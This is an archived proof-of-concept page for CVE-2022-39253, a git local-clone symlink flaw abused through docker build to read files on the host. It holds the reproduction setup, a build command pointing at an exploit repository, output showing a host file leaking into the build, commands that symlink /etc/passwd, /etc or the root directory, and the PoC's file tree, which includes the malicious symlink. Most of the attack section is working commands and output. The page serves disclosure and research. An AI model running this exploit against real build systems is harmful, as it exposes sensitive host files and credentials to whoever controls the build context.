关联漏洞
介绍
# docker host file read (using cve-2022-39253) poc
## PoC
<details>
<summary> reproduce environment </summary>
```
$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait minutes for environment starting ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0
ubuntu login: root
Password: root
root@ubuntu:~# apt list --installed |grep "git/now"
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]
root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84
```
</details>
```
echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main
```
```
Sending build context to Docker daemon 234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
---> 334e4a014c81
Step 2/4 : COPY / /
---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
---> Running in e21e9a9c8294
-rw-r--r-- 1 root root 8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
---> 2330735e84e4
Successfully built 2330735e84e4
```
## How to read other file or directory
```
ln -s /etc/passwd evil2/git/objects/host
```
or
```
ln -s /etc evil2/git/objects/host
```
You can even read the root directory `/`.
## Security Advisories
* https://github.com/moby/moby/security/advisories/GHSA-vp35-85q5-9f25
* https://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85
文件快照
[4.0K] /data/pocs/00089b0351096465b6d6deb1eb77c864a5acc7d5
├── [ 172] Dockerfile
├── [4.0K] evil
├── [4.0K] evil2
│ └── [4.0K] git
│ ├── [ 5] COMMIT_EDITMSG
│ ├── [ 92] config
│ ├── [ 73] description
│ ├── [ 23] HEAD
│ ├── [4.0K] hooks
│ │ ├── [ 478] applypatch-msg.sample
│ │ ├── [ 896] commit-msg.sample
│ │ ├── [ 189] post-update.sample
│ │ ├── [ 424] pre-applypatch.sample
│ │ ├── [1.6K] pre-commit.sample
│ │ ├── [ 416] pre-merge-commit.sample
│ │ ├── [1.5K] prepare-commit-msg.sample
│ │ ├── [1.3K] pre-push.sample
│ │ ├── [4.8K] pre-rebase.sample
│ │ ├── [ 544] pre-receive.sample
│ │ ├── [2.7K] push-to-checkout.sample
│ │ └── [3.6K] update.sample
│ ├── [ 137] index
│ ├── [4.0K] info
│ │ ├── [ 240] exclude
│ │ └── [ 59] refs
│ ├── [4.0K] logs
│ │ ├── [ 150] HEAD
│ │ └── [4.0K] refs
│ │ └── [4.0K] heads
│ │ └── [ 150] master
│ ├── [4.0K] objects
│ │ ├── [4.0K] e6
│ │ │ └── [ 15] 9de29bb2d1d6434b8b29ae775ad8c2e48c5391
│ │ ├── [4.0K] f6
│ │ │ └── [ 122] 6ae89dec4c3bcdc5e26a05013f9e81a9d289ac
│ │ ├── [4.0K] f9
│ │ │ └── [ 54] 3e3a1a1525fb5b91020da86e44810c87a2d7bc
│ │ ├── [ 12] host -> /tmp/escaped
│ │ └── [4.0K] info
│ │ └── [ 1] packs
│ └── [4.0K] refs
│ └── [4.0K] heads
│ └── [ 41] master
└── [1.9K] README.md
15 directories, 29 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。